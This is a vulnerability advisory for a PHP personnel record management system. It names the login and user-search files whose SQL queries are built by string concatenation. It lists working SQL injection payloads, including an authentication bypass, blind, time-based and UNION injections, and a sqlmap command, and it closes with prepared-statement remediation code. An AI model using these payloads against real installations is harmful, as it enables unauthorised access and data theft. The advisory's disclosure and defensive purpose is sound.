# Personnel Record Management System SQL Injection Vulnerability

## Vulnerability Overview

| Item | Content |
|:---|:---|
| **Vulnerability Name** | Personnel Record Management System SQL Injection Vulnerability |
| **Vulnerability Type** | SQL Injection (SQLi) |
| **Affected Platform** | Sourcecodester (open source code sharing platform, over 29,000 downloads) |
| **Project Link** | sourcecodester.com/php/5107/record-management-system.html |

---

## Impact Scope

### Affected Components

- **Login Module**: `index.php`
- **User Management Module**: `add_user.php`, `search_user.php`

### Vulnerability Details

#### Root Cause 1: Global SQL Injection & Authentication Bypass

- **Vulnerable File**: `index.php` (Lines 38-47)
- **Issue**: The authentication query is built by direct string concatenation of the `$UserName` and `$Password` parameters, with no filtering or parameterization
- **Risk**: An attacker can inject arbitrary SQL logic to bypass the authentication check entirely and gain access to the administrator backend

#### Root Cause 2: Fuzzy Search SQL Injection

- **Vulnerable File**: `search_user.php` (Lines 142-147)
- **Issue**: The `search` POST parameter is embedded directly into the SQL `LIKE` clause without any preprocessing
- **Risk**: Allows Boolean-based blind injection, time-based blind injection, UNION injection, and other injection techniques

---

## POC Code/Exploit Payloads

### 1. Global SQL Injection & Authentication Bypass

| Type | Payload |
|:---|:---|
| **Boolean-based Blind Injection** | `UserName=123' RLIKE (SELECT (CASE WHEN (1470=1470) THEN 123 ELSE 0x28 END))-- GxAC&Password='OR '1'='1&Login=` |
| **Time-based Blind Injection** | `UserName=123' AND (SELECT 4771 FROM (SELECT(SLEEP(5)))xADf)-- GwA&Password='OR '1'='1&Login=` |

**Result**: The attacker bypasses the login mechanism and enters the management backend.

---

### 2. Fuzzy Search SQL Injection

| Type | Payload |
|:---|:---|
| **Boolean-based Blind Injection** | `search=-5641' OR 7541=7541#` |
| **Time-based Blind Injection** | `search=test' AND (SELECT 8891 FROM (SELECT(SLEEP(5)))fApJ)-- Vozp` |
| **UNION Injection** | `search=test' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x614364d9544e0668d01407a5885466576876e654656255556985453455555974524566a784757,0x717a787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#` |

---

### SQLMap Verification Command

```bash
sqlmap -r search_req.txt -p search --dbs --batch
```

---

## Remediation Solutions

| Priority | Measure | Description |
|:---|:---|:---|
| 1 | **Patch Management** | Closely monitor official security advisories and promptly deploy security patches |
| 2 | **Use Prepared Statements** | Completely abandon direct string concatenation; switch to PDO or MySQLi parameterized queries so that code logic is strictly separated from user data |
| 3 | **Strict Input Validation** | Follow the "never trust external input" principle; apply strict type validation and filtering to all data exchanged between frontend and backend |
| 4 | **Principle of Least Privilege** | Give the application its own database account with only the read/write permissions it needs; never connect to the database as root |
| 5 | **Environment Configuration & Monitoring** | Disable PHP error display in production (`display_errors = off`); deploy a WAF to intercept common injection attacks; conduct regular security code audits |
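To make remediation measure 2 concrete, the following is an added example (not code from the project) that places the concatenation pattern described for `index.php` and `search_user.php` beside a PDO prepared-statement version. It assumes a `users` table with `username`, `password` and `name` columns and passwords stored with `password_hash()`; the table and column names are assumptions, not taken from the project.

```php
<?php
// Added example, not the project's own code. Table/column names are assumed.

// Connection hardening: real server-side prepares, exceptions on error.
function connect(string $dsn, string $user, string $pass): PDO
{
    $pdo = new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // parameters are sent separately from SQL text
    ]);
    return $pdo;
}

// --- Vulnerable pattern (reconstructed for illustration): input becomes SQL syntax ---
function loginVulnerable(PDO $pdo, string $userName, string $password): ?array
{
    $sql = "SELECT * FROM users WHERE username = '$userName' AND password = '$password'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

function searchVulnerable(PDO $pdo, string $search): array
{
    $sql = "SELECT * FROM users WHERE name LIKE '%$search%'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened: the SQL text is fixed; user data is only ever a bound value ---
function loginSafe(PDO $pdo, string $userName, string $password): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :u');
    $stmt->execute([':u' => $userName]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Compare the password hash in PHP, not inside the query (assumes password_hash() storage).
    return ($row !== false && password_verify($password, $row['password'])) ? $row : null;
}

function searchSafe(PDO $pdo, string $search): array
{
    // Binding alone keeps the input out of the SQL grammar; escaping LIKE
    // wildcards additionally stops a user from widening the pattern with % or _.
    $pattern = '%' . strtr($search, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $pdo->prepare("SELECT * FROM users WHERE name LIKE :p ESCAPE '!'");
    $stmt->execute([':p' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

With the hardened functions, a login value such as `' OR '1'='1` or a search value such as `test' AND (SELECT ...)` is matched literally as a username or name fragment and can no longer alter the query.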